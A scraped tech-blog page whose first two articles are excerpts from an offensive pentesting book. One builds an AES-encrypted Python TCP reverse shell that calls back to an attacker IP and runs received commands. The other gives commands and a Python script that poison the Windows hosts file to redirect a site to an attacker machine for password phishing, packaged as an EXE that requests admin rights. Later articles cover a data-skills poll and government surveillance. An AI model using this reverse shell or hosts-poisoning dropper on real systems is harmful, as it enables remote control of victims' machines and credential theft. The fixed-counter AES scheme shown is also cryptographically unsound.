Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Savia Lobo

15 Jun 2018

7 min read

TCP (Transfer Communication Protocol) is used to streamline important communications. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. Thus, it becomes highly important to secure this data to avoid MITM (man in the middle attacks). In this article, you will learn how to protect your TCP tunnel using the Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest'written by Hussam Khrais. Protecting your tunnel with AES In this section, we will protect our TCP tunnel with AES encryption. Now, generally speaking, AES encryption can operate in two modes, the Counter (CTR) mode encryption (also called the Stream Mode) and the Cipher Block Chaining (CBC) mode encryption (also called the Block Mode). Cipher Block Chaining (CBC) mode encryption The Block Mode means that we need to send data in the form of chunks: For instance, if we say that we have a block size of 512 bytes and we want to send 500 bytes, then we need to add 12 bytes additional padding to reach 512 bytes of total size. If we want to send 514 bytes, then the first 512 bytes will be sent in a chunk and the second chunk or the next chunk will have a size of 2 bytes. However, we cannot just send 2 bytes alone, as we need to add additional padding of 510 bytes to reach 512 in total for the second chunk. Now, on the receiver side, you would need to reverse the steps by removing the padding and decrypting the message. Counter (CTR) mode encryption Now, let's jump to the other mode, which is the Counter (CTR) mode encryption or the Stream Mode: Here, in this mode, the message size does not matter since we are not limited with a block size and we will encrypt in stream mode, just like XOR does. Now, the block mode is considered stronger by design than the stream mode. In this section, we will implement the stream mode and I will leave it to you to search around and do the block mode. The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. So, as a start, we will use AES without TCP or HTTP tunneling: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES Stream import os from Crypto.Cipher import AES counter = os.urandom(16) #CTR counter string value with length of 16 bytes. key = os.urandom(32) #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. # Instantiate a crypto object called enc enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter) encrypted = enc.encrypt("Hussam"*5) print encrypted # And a crypto object for decryption dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter) decrypted = dec.decrypt(encrypted) print decrypted The code is quite straightforward. We will start by importing the os library, and we will import the AES class from Crypto.Cipher library. Now, we use the os library to create the random key and random counter. The counter length is 16 bytes, and we will go for 32 bytes length for the key size in order to implement AES-256. Next, we create an encryption object by passing the key, the AES mode (which is again the stream or CTR mode) and the counter value. Now, note that the counter is required to be sent as a callable object. That's why we used lambda structure or lambda construct, where it's a sort of anonymous function, like a function that is not bound to a name. The decryption is quite similar to the encryption process. So, we create a decryption object, and then pass the encrypted message and finally, it prints out the decrypted message, which should again be clear text. So, let's quickly test this script and encrypt my name. Once we run the script the encrypted version will be printed above and the one below is the decrypted one, which is the clear-text one: >>> ]ox:|s Hussam >>> So, to test the message size, I will just invoke a space and multiply the size of my name with 5. So, we have 5 times of the length here. The size of the clear-text message does not matter here. No matter what the clear-text message was, with the stream mode, we get no problem at all. Now, let us integrate our encryption function to our TCP reverse shell. The following is the client side script: # Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Client - TCP Reverse Shell import socket import subprocess from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def encrypt(message): encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.10.100', 8080)) while True: command = decrypt(s.recv(1024)) print ' We received: ' + command ... What I have added was a new function for encryption and decryption for both sides and, as you can see, the key and the counter values are hardcoded on both sides. A side note I need to mention is that we will see in the hybrid encryption later how we can generate a random value from the Kali machine and transfer it securely to our target, but for now, let's keep it hardcoded here. The following is the server side script: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Server- TCP Reverse Shell import socket from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("10.10.10.100", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr ... This is how it works. Before sending anything, we will pass whatever we want to send to the encryption function first. When we get the shell prompt, our input will be passed first to the encryption function; then it will be sent out of the TCP socket. Now, if we jump to the target side, it's almost a mirrored image. When we get an encrypted message, we will pass it first to the decryption function, and the decryption will return the clear-text value. Also, before sending anything to the Kali machine, we will encrypt it first, just like we did on the Kali side. Now, run the script on both sides. Keep Wireshark running in background at the Kali side. Let's start with the ipconfig. So on the target side, we will able to decipher or decrypt the encrypted message back to clear text successfully. Now, to verify that we got the encryption in the transit path, on the Wireshark, if we right-click on the particular IP and select Follow TCP Stream in Wireshark, we will see that the message has been encrypted before being sent out to the TCP socket. To summarize, we learned to safeguard our TCP tunnel during passage of information using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn to protect the TCP tunnel using RSA. IoT Forensics: Security in an always connected world where things talk Top 5 penetration testing tools for ethical hackers Top 5 cloud security threats to look out for in 2018

0
0
32335

article-image-phish-for-passwords-using-dns-poisoning

Savia Lobo

14 Jun 2018

6 min read

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo

14 Jun 2018

6 min read

Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais. Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing

0
0
39769

article-image-data-professionals-planning-to-learn-this-year-python-deep-learning

Amey Varangaonkar

14 Jun 2018

4 min read

What are data professionals planning to learn this year? Python, deep learning, yes. But also...

Amey Varangaonkar

14 Jun 2018

4 min read

One thing that every data professional absolutely dreads is the day their skills are no longer relevant in the market. In an ever-changing tech landscape, one must be constantly on the lookout for the most relevant, industrially-accepted tools and frameworks. This is applicable everywhere - from application and web developers to cybersecurity professionals. Not even the data professionals are excluded from this, as new ways and means to extract actionable insights from raw data are being found out almost every day. Gone are the days when data pros stuck to a single language and a framework to work with their data. Frameworks are more flexible now, with multiple dependencies across various tools and languages. Not just that, new domains are being identified where these frameworks can be applied, and how they can be applied varies massively as well. A whole new arena of possibilities has opened up, and with that new set of skills and toolkits to work on these domains have also been unlocked. What’s the next big thing for data professionals? We recently polled thousands of data professionals as part of our Skill-Up program, and got some very interesting insights into what they think the future of data science looks like. We asked them what they were planning to learn in the next 12 months. The following word cloud is the result of their responses, weighted by frequency of the tools they chose: What data professionals are planning on learning in the next 12 months Unsurprisingly, Python comes out on top as the language many data pros want to learn in the coming months. With its general-purpose nature and innumerable applications across various use-cases, Python’s sky-rocketing popularity is the reason everybody wants to learn it. Machine learning and AI are finding significant applications in the web development domain today. They are revolutionizing the customers’ digital experience through conversational UIs or chatbots. Not just that, smart machine learning algorithms are being used to personalize websites and their UX. With all these reasons, who wouldn’t want to learn JavaScript, as an important tool to have in their data science toolkit? Add to that the trending web dev framework Angular, and you have all the tools to build smart, responsive front-end web applications. We also saw data professionals taking active interest in the mobile and cloud domains as well. They aim to learn Kotlin and combine its power with the data science tools for developing smarter and more intelligent Android apps. When it comes to the cloud, Microsoft’s Azure platform has introduced many built-in machine learning capabilities, as well as a workbench for data scientists to develop effective, enterprise-grade models. Data professionals also prefer Docker containers to run their applications seamlessly, and hence its learning need seems to be quite high. [box type="shadow" align="" class="" width=""]Has machine learning with JavaScript caught your interest? Don’t worry, we got you covered - check out Hands-on Machine Learning with JavaScript for a practical, hands-on coverage of the essential machine learning concepts using the leading web development language. [/box] With Crypto’s popularity off the roof (sadly, we can’t say the same about Bitcoin’s price), data pros see Blockchain as a valuable skill. Building secure, decentralized apps is on the agenda for many, perhaps. Cloud, Big Data, Artificial Intelligence are some of the other domains that the data pros find interesting, and feel worth skilling up in. Work-related skills that data pros want to learn We also asked the data professionals what skills the data pros wanted to learn in the near future that could help them with their daily jobs more effectively. The following word cloud of their responses paints a pretty clear picture: Valuable skills data professionals want to learn for their everyday work As Machine learning and AI go mainstream, so do their applications in mainstream domains - often resulting in complex problems. Well, there’s deep learning and specifically neural networks to tackle these problems, and these are exactly the skills data pros want to master in order to excel at their work. [box type="shadow" align="" class="" width=""]Data pros want to learn Machine Learning in Python. Do you? Here’s a useful resource for you to get started - check out Python Machine Learning, Second Edition today![/box] So, there it is! What are the tools, languages or frameworks that you are planning to learn in the coming months? Do you agree with the results of the poll? Do let us know. What are web developers favorite front-end tools? Packt’s Skill Up report reveals all Data cleaning is the worst part of data analysis, say data scientists 15 Useful Python Libraries to make your Data Science tasks Easier

0
0
42899

article-image-building-c-game-play-engines-in-finite-state-machine-pattern

Amarabha Banerjee

14 Jun 2018

20 min read

Building C++ game play engines in finite state machine pattern [Tutorial]

Amarabha Banerjee

14 Jun 2018

20 min read

0
0
48354

article-image-alarming-ways-governments-use-surveillance-tech

Neil Aitken

14 Jun 2018

12 min read

Alarming ways governments are using surveillance tech to watch you

Neil Aitken

14 Jun 2018

12 min read

Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and PapaJohns pizza. The company is about to release an app that users can install on their smartphone. Their new application will record and transmit video images of what’s happening in front of your vehicle, as you travel. Data can be sent from any phone with a camera – using the most common of tools – a simple mobile data plan, for example. In exchange, you’ll get live traffic updates, among other things. Mapquest will use the video image data they gather to provide more accurate and up to date maps to their partners. The real world is changing all the time – roads get added, cities re-route traffic from time to time. The new AI based technology Mapquest employ could well improve the reliability of driverless cars, which have to engage with this ever changing landscape, in a safe manner. No-one disagrees with safety improvements. Mapquests solution is impressive technology. The fact that they can use AI to interpret the images they see and upload the information they receive to update maps is incredible. And, in this regard, the company is just one of the myriad daily news stories which excite and astound us. These stories do, however, often have another side to them which is rarely acknowledged. In the wrong hands, Mapquest’s solution could create a surveillance database which tracked people in real time. Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal. The principle is simple. The more ‘they’ know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or potentially, to change your mind, without even realising that you had been watched. Mapquest’s innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise. Read also: What does the US government know about you? The truth beyond the Facebook scandal Facebook’s share price fell 14% in early 2018 as a result of public outcry related to the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Technology tools like Mapquest’s tracking capabilities and Facebook’s profiling techniques are being taken and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developing world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that will genuinely make you want to consider going off grid! Innovative, Ingenious overlords: US companies have a flare for surveillance The US is the centre for information based technology companies. Much of what they develop is exported as well as used domestically. The police are using human genome matching to track down criminals and can find ‘any family in the country’ There have been 2 recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andme to sequence their genome (DNA) either to investigate further their family tree, or to determine the potential of a pre-disposition to the gene based component of a disease. In one example, The Golden State Killer, an ex cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andme with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service and it is believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, the law enforcement has the DNA of every individual in the country available to them. Domain Awareness Centers (DAC) bring the Truman Show to life The 400,000 Residents of Oakland, California discovered in 2012, that they had been the subject of an undisclosed mass surveillance project, by the local police force, for many years. Feeds from CCTV cameras installed in Oakland’s suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland’s port with Federal funding as part of a national response to the events of 9.11.2001 but was extended to cover the near half million residents of the city. Hundreds of additional video cameras were installed, along with gunshot recognition microphones and some of the other surveillance technologies provided in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept. Internet connected toys spy on children The FBI has warned Americans that children’s toys connected to the internet ‘could put the privacy and safety of children at risk.' Children’s toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI’s press release. Internet connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them. Oracle suggest Google’s Android operating system routinely tracks users’ position even when maps are turned off In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users’ location (including altitude), even when mapping software is turned off on the device. The tracking is performed in the background of their phone. In Australia alone, Oracle suggested that Google’s monitoring could involve around 1GB of additional mobile data every month, costing users nearly half a billion dollars a year, collectively. Amazon facial recognition in real time helps US law enforcement services Amazon are providing facial recognition services which take a feed from public video cameras, to a number of US Police Forces. Amazon can match images taken in real time to a database containing ‘millions of faces.’ Are there any state or Federal rules in place to govern police facial recognition? Wired reported that there are ‘more or less none.’ Amazon’s scheme is a trial taking place in Florida. There are at least 2 other companies offering similar schemes in the US to law enforcement services. Big glass microphone can help agencies keep an ear on the ground Project ‘Big Glass Microphone’ uses the vibrations that the movements of cars (among other things) cause in the buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University Campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure - the way your phone and computer connect to the internet. Big glass microphone as it stands is the first step towards ‘invisible’ monitoring of people and their assets. It appears the FBI now have the ability to crack/access any phone Those in the know suggest that Apple’s iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernadino shooters and ultimately sued Apple in an attempt to force the company to grant access to it, as part of their investigation. The case was ultimately dropped leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple’s assistance, implying that even the most secure phones can now be accessed by authorities. Cornell University’s lie detecting algorithm Groundbreaking work by Cornell University will provide ‘at a distance’ access to information that previously required close personal access to an accused subject. Cornell’s solution interprets feeds from a number of video cameras on subjects and analyses the results to judge their heart rate. They believe the system can be used to determine if someone is lying from behind a screen. University of Southern California can anticipate social unrest with social media feeds Researchers at the University Of Southern California have developed an AI tool to study Social Media posts and determine whether those writing them are likely to cause Social Unrest. The software claims to have identified an association between both the volume of tweets written / the content of those tweets and protests turning physical. They can now offer advice to law enforcement on the likelihood of a protest turning violent so they can be properly prepared based on this information. The UK, an epicenter of AI progress, is not far behind in tracking people The UK has a similarly impressive array of tools at its disposal to watch the people that representatives of the country feels may be required. Given the close levels of cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners. Project stingray – fake cell phone/mobile phone ‘towers’ to intercept communications Stingray is a brand name for an IMSI (the unique identifier on a SIM card) tracker. They ‘spoof’ real towers, presenting themselves as the closest mobile phone tower. This ‘fools’ phones in to connecting to them. The technology has been used to spy on criminals in the UK but it is not just the UK government which use Stingray or its equivalents. The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the Whitehouse, using the same technology. UK developed Spyware is being used by authoritarian regimes Gamma International is a company based in Hampshire UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware delivered with a virus on to computers in their country. Once installed, the software permitted the government to monitor private digital interactions, without the need to engage the phone company or ISP offering those services. Any internet based technology could be tracked, assisting in tracking down individuals who may have negative feelings about the Egyptian government. Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand A Drug Dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an image of his fingerprint. From that, forensic scientists used by UK police, confirmed that officers had arrested the correct person and associated him with drugs. AI solutions to speed up evidence processing including scanning laptops and phones UK police forces are trying out AI software to speed up processing evidence from digital devices. A dozen departments around the UK are using software, called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellbrite can recognize images that contain child abuse, accepts feeds from multiple devices to see when multiple owners were in the same physical location at the same time and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them show up on someone’s hard drive. China takes the surveillance biscuit and may show us a glimpse of the future There are 600 million mobile phone users in China, each producing a great deal of information about their users. China has a notorious record of human rights abuses and the ruling Communist Party takes a controlling interest (a board seat) in many of their largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporate. As a result, China is on the front foot when it comes to both AI and surveillance technology. China’s surveillance tools could be a harbinger of the future in the Western world. Chinese cities will be run by a private company Alibaba, China’s equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about it’s ambitions. It has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI based product they’re using is called CityBrain. In the future, all Chinese cities could well all be run by AI from the Alibaba corporation the idea is to use this trial as a template for every city. The technology is likely to be placed in Kuala Lumpur next. In the areas under CityBrain’s control, traffic speeds have increased by 15% already. However, some of those observing the situation have expressed concerns not just about (the lack of) oversight on CityBrain’s current capabilities but the potential for future abuse. What to make of this incredible list of surveillance capabilities Facilities like Mapquest’s new mapping service are beguiling. They’re clever ideas which create a better works. Similar technology, however, behind the scenes, is being adopted by law enforcement bodies in an ever growing list of countries. Even for someone who understands cutting edge technology, the sum of those facilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, your heatmap and, of course, the contents of your phone and laptops can now be monitored. Law enforcement can access and review information feeds with Artificial Intelligence software, to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Concerningly, these advances seem to be coming without policy or, in many cases any form of oversight. We must change how we think about AI, urge AI founding fathers

0
0
25733

Use TensorFlow and NLP to detect duplicate Quora questions [Tutorial]

Create a travel app with Xamarin [Tutorial]

Splunk: How to work with multiple indexes [Tutorial]

Delphi: memory management techniques for parallel programming

The 5 most popular programming languages in 2018

A step by step guide to creating Odoo Addon Modules

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Handling backup and recovery in PostgreSQL 10 [Tutorial]

Working with shaders in C++ to create 3D games

Implement an API Design-first approach for building APIs [Tutorial]

Trending Topics

Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Phish for passwords using DNS poisoning [Tutorial]

What are data professionals planning to learn this year? Python, deep learning, yes. But also...

Building C++ game play engines in finite state machine pattern [Tutorial]

Alarming ways governments are using surveillance tech to watch you